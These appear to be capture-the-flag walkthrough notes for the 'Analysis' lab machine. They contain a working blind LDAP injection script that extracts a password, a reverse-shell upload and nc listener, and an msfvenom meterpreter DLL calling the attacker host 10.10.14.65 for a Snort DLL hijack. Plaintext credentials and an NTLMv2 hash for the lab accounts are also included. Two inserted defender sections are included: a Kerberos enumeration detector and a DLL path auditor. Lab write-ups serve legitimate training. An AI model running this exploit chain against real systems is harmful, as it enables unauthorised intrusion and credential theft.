53,80,88,135,139,445,464,593,3268,3269,3306,5985,9389,33060,47001,49664,49665,49666,49667,49669,49670,49671,49672,49676,49679,49784
echo "10.129.230.179 analysis.htb dc.analysis.htb" >> /etc/hosts
kerbrute:
kerbrute userenum -d analysis.htb /usr/share/wordlists/rockyou.txt --dc dc.analysis.htb
2024/01/25 06:33:01 > [+] VALID USERNAME: jangel@analysis.htb
2024/01/25 06:33:06 > [+] VALID USERNAME: technician@analysis.htb
2024/01/25 06:34:17 > [+] VALID USERNAME: cwilliams@analysis.htb
2024/01/25 06:34:53 > [+] VALID USERNAME: ajohnson@analysis.htb
2024/01/25 06:35:33 > [+] VALID USERNAME: wsmith@analysis.htb
2024/01/25 06:43:06 > [+] VALID USERNAME: TECHNICIAN@analysis.htb
2024/01/25 06:43:18 > [+] VALID USERNAME: JANGEL@analysis.htb
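The defender's side of the enumeration above, as an added example that is not part of these notes: the Python below flags a client address that requests TGTs for many distinct non-existent principals within a short window. The log lines are constructed and only loosely modelled on Windows Security event 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN); the field layout is a simplified key=value form, not the real event XML, and the check assumes the domain controller audits failed TGT requests.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. Loosely modelled on event 4768 failure audits; the
# key=value layout is an assumption for this example, not the real event format.
SAMPLE_LOG = """\
2024-01-25T06:33:00Z EventID=4768 TargetUserName=administrator ClientAddress=::ffff:10.129.230.200 Status=0x0
2024-01-25T06:33:01Z EventID=4768 TargetUserName=aaron ClientAddress=::ffff:10.10.14.65 Status=0x6
2024-01-25T06:33:01Z EventID=4768 TargetUserName=abby ClientAddress=::ffff:10.10.14.65 Status=0x6
2024-01-25T06:33:02Z EventID=4768 TargetUserName=adam ClientAddress=::ffff:10.10.14.65 Status=0x6
2024-01-25T06:33:02Z EventID=4768 TargetUserName=alex ClientAddress=::ffff:10.10.14.65 Status=0x6
2024-01-25T06:33:03Z EventID=4768 TargetUserName=amy ClientAddress=::ffff:10.10.14.65 Status=0x6
2024-01-25T06:33:03Z EventID=4768 TargetUserName=jangel ClientAddress=::ffff:10.10.14.65 Status=0x0
2024-01-25T06:33:04Z EventID=4768 TargetUserName=andy ClientAddress=::ffff:10.10.14.65 Status=0x6
2024-01-25T06:40:00Z EventID=4768 TargetUserName=typo.user ClientAddress=::ffff:10.129.230.201 Status=0x6
2024-01-25T06:41:00Z EventID=4768 TargetUserName=typo.user ClientAddress=::ffff:10.129.230.201 Status=0x6
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<event>\d+) TargetUserName=(?P<user>\S+) "
    r"ClientAddress=(?P<addr>\S+) Status=(?P<status>0x[0-9a-fA-F]+)$"
)

KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # "client not found in Kerberos database"


def parse_events(text):
    """Parse the simplified log lines into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr = m["addr"]
        if addr.startswith("::ffff:"):        # IPv4-mapped IPv6, as the DC logs it
            addr = addr[len("::ffff:"):]
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "event": int(m["event"]),
            "user": m["user"].lower(),
            "addr": addr,
            "status": int(m["status"], 16),
        })
    return events


def detect_user_enumeration(events, window_seconds=60, threshold=5):
    """Alert once per client address that asks for TGTs of `threshold` or more
    distinct unknown principals inside any `window_seconds` sliding window.
    A single user mistyping their own name never reaches the threshold."""
    per_addr = defaultdict(list)
    for ev in events:
        if ev["event"] == 4768 and ev["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            per_addr[ev["addr"]].append(ev)

    alerts, window = [], timedelta(seconds=window_seconds)
    for addr, evs in per_addr.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end, ev in enumerate(evs):
            while ev["ts"] - evs[start]["ts"] > window:   # slide the window forward
                start += 1
            distinct = {e["user"] for e in evs[start:end + 1]}
            if len(distinct) >= threshold:
                alerts.append({"addr": addr, "first": evs[start]["ts"],
                               "last": ev["ts"], "distinct_users": len(distinct)})
                break                                     # one alert per address
    return alerts


if __name__ == "__main__":
    for alert in detect_user_enumeration(parse_events(SAMPLE_LOG)):
        print(f"[!] possible Kerberos user enumeration from {alert['addr']}: "
              f"{alert['distinct_users']} unknown principals between "
              f"{alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}")
```

The threshold and window are deliberately low here so the constructed sample trips the rule; on a real domain they need tuning against the normal rate of mistyped usernames, and the same per-address aggregation applies unchanged to events pulled from a SIEM.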
subdomain scanning finds internal.analysis.htb; add it to /etc/hosts
git clone https://github.com/maurosoria/dirsearch.git --depth 1
python3 dirsearch.py -u http://internal.analysis.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dirsearch finds a login page:
http://internal.analysis.htb/employees/
and more under /user
http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=*)
it's LDAP injection: the name parameter is placed into the LDAP filter unescaped
import urllib.parse

import requests

# Blind LDAP injection against list.php. The injected filter
#   *)(&(objectClass=user)(description=<known prefix><guess>*)
# only matches the technician account while the guessed prefix is right, so
# "technician" appears in the response exactly when the guess is correct.
CHARSET_PATH = "/opt/useful/SecLists/Fuzzing/alphanum-case-extra.txt"
BASE_URL = ("http://internal.analysis.htb/users/list.php?name=*)(%26"
            "(objectClass=user)(description={found_char}{FUZZ}*)")


def main():
    with open(CHARSET_PATH) as fh:
        charset = [line.strip() for line in fh if line.strip()]

    found_chars = ""
    # '*' is an LDAP wildcard, so it matches regardless of the real character
    # and cannot be tested like the others. It is known to be the 7th character
    # of this password, so it is inserted by hand once six characters are found.
    skip_count = 6
    add_star = True

    while True:
        matched = False
        for char in charset:
            if "*" in char:
                if skip_count > 0:
                    skip_count -= 1          # not at the '*' position yet
                    continue
                if add_star:
                    found_chars += char      # hard-coded '*' position
                    print(f"[+] Found Password: {found_chars}")
                    add_star = False
                continue                     # never send '*' as a guess: it always matches
            url = (BASE_URL.replace("{FUZZ}", urllib.parse.quote(char))
                           .replace("{found_char}", urllib.parse.quote(found_chars)))
            response = requests.get(url, timeout=10)
            if response.status_code == 200 and "technician" in response.text:
                found_chars += char
                print(f"[+] Found Password: {found_chars}")
                matched = True
                break                        # restart the charset for the next position
        if not matched:
            break                            # a full pass with no match: password complete
    print(f"[*] Done: {found_chars}")


if __name__ == "__main__":
    main()
TECHNICIAN@analysis.htb:97NTtl*4QP96Bv
go back to the login page
try to upload a reverse shell
nc -lvnp 1234
get initial access
I ran winPEAS.exe on the target machine
svc_web::ANALYSIS:1122334455667788:f0cf2b9ea6ed06151191863c3d470381:01010000000000005771166f7d4fda01e239d6af28279dba0000000008003000300000000000000000000000002100002e2361ea3bcbc97ed694aa26c2747045c2b2409b2e9c0ac817ab5e11b5f974080a00100000000000000000000000000000000000090000000000000000000000000
jdoe:7y4Z4^*y9Zzj
try that credential with evil-winrm
evil-winrm -u 'jdoe' -p '7y4Z4^*y9Zzj' -i 10.129.55.86
Snort is installed on the target; its config file shows it loads sf_engine.dll
that DLL can be hijacked
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.65 LPORT=6666 -f dll -o reverse.dll
get the shell!
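A check for the exposure above from the defender's side, as an added Python example (mine, not from these notes or from the Snort project): it parses the dynamic-library directives of a Snort 2.x snort.conf (dynamicengine, dynamicpreprocessor, dynamicdetection) and flags a library that is missing, or that sits in a directory the current user can write to; either lets a non-admin drop a DLL that the service then loads. The config fragment and the host model are constructed, and the C:\Snort paths are stand-ins for the real layout. Caveat: os.access is a coarse approximation of Windows ACLs, which is why the exists/writable predicates are injectable; on a real host back them with icacls or Get-Acl.

```python
import ntpath
import os
import posixpath
import re

# Constructed snort.conf fragment in Snort 2.x syntax; the paths are stand-ins.
SAMPLE_CONF = r"""
# dynamic libraries loaded by the service at start-up
dynamicpreprocessor directory C:\Snort\lib\snort_dynamicpreprocessor
dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll
dynamicdetection directory C:\Snort\lib\snort_dynamicrules
"""

DIRECTIVE_RE = re.compile(
    r"^\s*(dynamicengine|dynamicpreprocessor|dynamicdetection)\s+"
    r"(?:(directory|file)\s+)?(.+?)\s*$", re.IGNORECASE)


def parse_dynamic_libraries(conf_text):
    """Return (directive, kind, path) for each dynamic-library directive; kind is
    'file' or 'directory' (a bare 'dynamicengine <path>' names a file)."""
    entries = []
    for raw in conf_text.splitlines():
        m = DIRECTIVE_RE.match(raw.split("#", 1)[0])      # drop trailing comments
        if m:
            directive = m.group(1).lower()
            kind = (m.group(2) or "file").lower()
            entries.append((directive, kind, m.group(3).strip('"')))
    return entries


def _dirname(path):
    # Windows-style paths are handled with ntpath even when this runs on POSIX.
    return (ntpath if "\\" in path else posixpath).dirname(path)


def audit_library_paths(entries, exists=os.path.exists,
                        writable=lambda p: os.access(p, os.W_OK)):
    """Flag libraries that do not exist yet or live in a writable directory.
    Both predicates are injectable so a model of another host can be audited."""
    findings = []
    for _directive, kind, path in entries:
        directory = path if kind == "directory" else _dirname(path)
        if not exists(path):
            findings.append((path, "MISSING: a DLL dropped at this path would be loaded"))
        if writable(directory):
            findings.append((path, f"WRITABLE: {directory} is writable by the current user"))
    return findings


def audit_model():
    """Audit the constructed config against a constructed host model in which
    sf_engine.dll is absent and its directory is writable by normal users."""
    existing = {r"C:\Snort\lib\snort_dynamicpreprocessor", r"C:\Snort\lib\snort_dynamicrules"}
    writable_dirs = {r"C:\Snort\lib\snort_dynamicengine"}
    return audit_library_paths(parse_dynamic_libraries(SAMPLE_CONF),
                               exists=lambda p: p in existing,
                               writable=lambda p: p in writable_dirs)


if __name__ == "__main__":
    for path, issue in audit_model():
        print(f"{path}: {issue}")
```

Run on the host itself with the default predicates against the real snort.conf, the same two findings are what a hardening pass should make disappear: the configured DLL present, and its directory (and the preprocessor and rules directories) writable only by administrators and the service account.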